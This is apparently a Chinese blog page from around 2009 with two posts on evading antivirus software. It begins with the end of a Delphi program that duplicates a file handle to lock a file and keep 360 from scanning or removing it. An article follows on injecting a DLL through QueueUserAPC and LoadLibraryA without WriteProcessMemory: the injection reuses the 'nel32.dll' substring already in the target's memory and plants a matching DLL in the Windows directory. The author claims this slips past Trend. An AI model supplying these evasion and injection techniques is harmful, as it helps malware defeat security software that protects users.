  DuplicateHandle(GetCurrentProcess(), hFile, hProcess, @hTargetHandle, 0, FALSE, DUPLICATE_SAME_ACCESS or DUPLICATE_CLOSE_SOURCE);  
  CloseHandle(hProcess);    
end;  
begin  
  SetPrivilege;  
  OccupyFile(’D:\Program Files\工具软件\任务管理.exe’);//这是要保护的程序名  
end.  

Copyright © 2008

继续阅读《文件占坑法过360查杀!》的全文内容...

相关文章:

绕过主动防御的代码注入方法(非DELPHI代码)  (2009-6-14 15:36:39)

无法获取到某窗体中控件的句柄,应如何处理  (2009-6-3 22:28:49)

下载者源代码  (2008-12-28 23:40:44)

目前大多数的杀软都是hook NtWriteVirtualMemory和NtUserSetWindowsHookAW、NtUserSetWindowsHookE来防止代码注入。

关于代码注入Ring3层的方法主要有：

l 远程线程CreateRemoteThread

l 消息钩子SetWindowsHookEx

l Ring3 APC QueueUserApc

l 修改线程上下文SetContextThread

其中第一种和第三种方法需要传入一个param，但是要求这个param必须在目标进程内存空间，之前的一些方法比较笨重，直接在目标进程VirtualAllocEx内存，然后把希望的参数内容写入这个内存，使用了WriteProcessMemory函数，而这个函数是被hook的，所以杀软可以很容易的拦截代码注入行为。

仔细想想，杀软的这种防御是很失败的！原因是为了要一个param，攻击者完全没有必要做这么大的动作去目标进程内存空间申请内存并写内存，我在思考是否可以不用WriteProcessMemory函数呢？反正我的目的就是得到一个合理的param，并且这个param是在目标进程内存空间即可！

思考后，原来一切是这么容易啊，哈哈！乐了我半天~~~

举个例子：假设我是这样注入的：

QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;

我想让上面的param的内容是一个“xxx.dll”,就可以了，而且要求这个param是在目标进程内存空间

您想到了么？哈哈

答案：直接在目标进程搜索一个这样的字符串“nel32.dll”就可以啦！因为“kernel32.dll” 这样的字符串是一定存在的，那么为了和“kernel32.dll” 不一样，那就随便使用一下“nel32.dll”，或者“el32.dll”，都是可以的啊！最后在往windows目录下面撂进入一个nel32.dll，这样注入大部分杀软都是不能拦截到的！哈哈！

写了段程序，做了个试验，仅测试了下趋势，完美绕过！其实杀软稍后测试。。。

Copyright © 2008

继续阅读《绕过主动防御的代码注入方法(非DELPHI代码)》的全文内容...

相关文章:

文件占坑法过360查杀!  (2009-6-14 15:56:16)

下载者源代码  (2008-12-28 23:40:44)